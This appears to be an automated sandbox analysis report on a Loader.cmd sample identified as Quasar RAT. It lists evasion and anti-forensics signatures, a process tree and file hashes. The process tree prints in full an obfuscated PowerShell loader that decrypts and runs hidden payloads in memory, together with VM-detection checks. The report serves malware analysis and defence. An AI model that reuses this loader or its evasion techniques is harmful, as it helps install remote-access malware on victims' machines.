Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
-
submitted
05-01-2025 03:47
General
-
Target
Loader.cmd
-
Size
7.3MB
-
MD5
1bec1098946595a03fa067a3ef7ce292
-
SHA1
89cfb4a2f8800f1b944d906d959639907672317d
-
SHA256
a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
-
SHA512
dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
SSDEEP
49152:262lW3ZtqF71E0f+DP24xmB1F+RfHhZzvTUPbFJMg0FQ5/Ai4cr5YSW7iFsihJv1:k
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Modifies data under HKEY_USERS 61 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{24b9a0ea-28ed-4863-963a-510c1a22a860}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7c99463e-22cf-4fb0-a8f2-243f273f3c0e}2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.cmd"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\AppData\Local\Temp\Loader.cmd';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3500 -s 25764⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loader.cmd>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1092 -s 26086⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 37b9a9c5e4f659e8bb1465c15422e4a1 4yIkIn2OAkSRIfjhMJ4uKg.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3500 -ip 35002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 1092 -ip 10922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38KB
MD59abb1e9464301e3fd701d1ee6698cc59
SHA1813dcd1519be51748920036bf231e2ce90eaf3eb
SHA256384b1137732cb97e99092a8942dcc4cfa054c8e625adbcb50fcce06b53fb35dc
SHA5121be2e5774b04c16a6544bd1af3f0d3796ed2faef6c42c7ab78f0b6ea245d6bb0fd8372652d0b52b574c9af370304ff506302edfc5aabbd922949ec7278780142
-
Filesize
13KB
MD5efff6b71856009a50e9b8f6a95f2b724
SHA1b0a8b17032097d47e45b46e85aeac23a8eb26ce8
SHA256a6de21b473cb7c38b9e89a4342c3d17f6ff11546e49b97c3ec4d97d7c85e6322
SHA5127449b98b5f5db70c79959681cbf22f96699181cf52b5fc486f5f0b1b6a4762f6b097281a072a0d543f8a74f2ddd0e5b8d465bd9904f7a55908882a3cce7e9e11
-
Filesize
39KB
MD587bc2cbd3e9fdd50711978cdbfd419da
SHA15f2fbdb6d131331cfed96541054f13d0bc9df736
SHA256d9550cb4b2ecaa2d712285ada51816b9bc49ff7345485fd760ee07e0518758f0
SHA51251ca18cc20cab59141d8d8de3c25d7c69722942e10f2473063c4fe27409f03376429801a010ac6becf8e248dd68bdf0cf00f1864b1d89532cae7b6c682c40525
-
Filesize
13KB
MD55a4a62a3146970603053b7b237fa2f22
SHA1b347c99a34effb3985affdbdf25685d57a7cbfc4
SHA256c2a4de7def7af66c6bde9f9cd52b4f45073a596749a3e76b43e829058c566974
SHA512214efd8be64e5b922242d0d137cb815a6d14173c89af5322ca4d5b15830e887cab637faa8fa93e8814084b444c6e15a1d818d89402327d14c4b0893ac298fa1e
-
Filesize
3KB
MD5a46bd86514843f080048e6a4cd1384c9
SHA16226fc42f4ebd5f7f94dc30992d4d56c95b0fbb5
SHA2560dd1b8a3849afa31ad3752fcab3c5db1e368ba71dec6689e5a3a85f5727296fa
SHA5124acc30cf38e6968a8eda0fbde2b34b01b538e5d5241d91a4d9c7beffa46b37cac8575762ab9d3d4f025826a22f80925054f580dcb0325f0334a480e788cb17bb
-
Filesize
54KB
MD568c69cb99e4a23e94ea7241565708e2d
SHA1e2c36da387387139c8893134bb0f2ad07eee7dbd
SHA256531569da3b8ece3ee52a647dfd8f8c627e60cc2fc10558f901d782e03f8581f0
SHA5124e45d2d393e0c0a2814006facc4ba5e23d40996e15630fdb3a398e7cbe962684a5f359ba62fc6e26d2adda09a8a0e375398119e425629450a465faa23ae13a59
-
Filesize
3KB
MD578e80508b1695ff58b333ee4499fd2a7
SHA13a059f025b5d238c8c5d5de870cc5bb7a4b8b3a9
SHA256b5a9ddbdbf48ee1870fdfc3eb4a7c6b3bb03bae38764cf0e58f8eee0c3ab4b3c
SHA5129335af49bec8ff50e042f706a588646d32313a524be719da7245d037a96a86f52eef48695ef47dcf4787cd30dbef7f1708c93f7156e6c49639298aad3eec29dc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.3MB
MD51bec1098946595a03fa067a3ef7ce292
SHA189cfb4a2f8800f1b944d906d959639907672317d
SHA256a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
SHA512dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
Filesize
3KB
MD5c6086d02f8ce044f5fa07a98303dc7eb
SHA16116247e9d098b276b476c9f4c434f55d469129c
SHA2568901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA5121876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize
3KB
MD539b9eb9d1a56bc1792c844c425bd1dec
SHA1db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
